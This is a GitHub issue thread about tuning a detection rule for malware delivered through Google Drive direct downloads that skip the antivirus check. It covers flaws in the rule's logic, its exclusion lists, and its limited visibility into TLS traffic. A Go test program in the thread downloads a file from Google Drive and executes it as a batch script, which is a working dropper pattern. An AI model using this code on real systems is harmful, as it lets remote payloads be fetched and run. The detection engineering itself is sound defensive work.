[Rule Tuning] Google Drive Direct Download Detection
terrancedejesus opened this issue · comments
Link to rule
Description
This rule has some performance and false-positive considerations that should be addressed. The maxspan is small, however the use of wildcards and OR
logic may be too broad and cause performance issues when the first sequence query is collecting events.
Update 01-23-2024
After some initial triage, it appears that direct download links to Google Drive with parameter confirm=no_antivirus
may no longer be viable. Although this is submitted, response code 303 is given and redirection to a manual download page is given. Before, it would download the malware directly without the redirection.
While this is the case, the threat of leveraging Google Drive for malware distribution is still prevalent, however, further research and emulation will need to be conducted to properly tune this rule.
Regarding performance, the rule can also be adjusted - specifically with the initial sequence and wildcard usage. Since we have no visibility into the URL requested during the TLS connection, we are unable to write logic on URL parameters. As a result, we must rely on a collection of events with DNS traffic, process and file based events.
Go code to download directly from Google Drive and execute batch script- used for testing:
"io"
"net/http"
"os"
"os/exec"
)
func main() {
// Define a command-line flag
fileID := flag.String("id", "", "Google Drive file ID")
flag.Parse()
// Check if the file ID is provided
if *fileID == "" {
fmt.Println("Please provide a Google Drive file ID using -id flag.")
os.Exit(1)
}
filename := "downloaded_script.bat"
fileURL := fmt.Sprintf("https://drive.google.com/uc?export=download&id=%s&confirm=no_antivirus", *fileID)
err := downloadFile(filename, fileURL)
if err != nil {
panic(err)
}
fmt.Println("File downloaded successfully")
// Execute the file
err = executeBatchFile(filename)
if err != nil {
panic(err)
}
fmt.Println("Batch file executed successfully")
}
// downloadFile will download a url to a local file.
func downloadFile(filepath string, url string) error {
// Get the data
resp, err := http.Get(url)
if err != nil {
return err
}
defer resp.Body.Close()
// Create the file
out, err := os.Create(filepath)
if err != nil {
return err
}
defer out.Close()
// Write the body to file
_, err = io.Copy(out, resp.Body)
return err
}
// executeBatchFile executes a .bat file.
func executeBatchFile(filepath string) error {
cmd := exec.Command("cmd", "/C", filepath)
cmd.Stdout = os.Stdout
cmd.Stderr = os.Stderr
return cmd.Run()
}
Be aware that this OR after the first block makes nearly always the following parts useless, e.g. in our environment event.action
is always "load".
Please check if instead of the "or" "and" would be correct.
/* Look for processes started or libraries loaded from untrusted or unsigned Windows, Linux or macOS binaries */
(event.action in ("exec", "fork", "start", "load")) or
/* Look for Google Drive download URL with AV flag skipping */
(process.args : "*drive.google.com*" and process.args : "*export=download*" and process.args : "*confirm=no_antivirus*")
...
Also the benign process list does not contain firefox and chrome binaries on linux machines, only the windows parts.
...
and not process.executable:
("/bin/terraform",
"*/bin/dockerd",
"/usr/local/bin/docker-init",
"*/bin/go",
"?:\\Program Files*\\Mozilla Firefox\firefox.exe",
"?:\\Program Files*\\Google\\Chrome\\Application\\chrome.exe")
...
Update 02-01-2024
After some research and discussion, we have expanded the scope of this rule tuning issue. We will be decoupling some of the activity attempted to be identified with the original rule, as well as creating new rules to detect similar activity.
Details can be found in the tuning pull request: #3411 (comment)
A tasklist has been added at the top of this tuning to add additional scope.
This issue has been automatically marked as stale because it has not had recent activity. It will be closed if no further activity occurs. Thank you for your contributions.
Closing this issue. Original tuning has been completed. Further investigation revealed that HTTPS and TLS are used for making connections to Google Drive by default and thus we do not have proper visibility via existing integrations.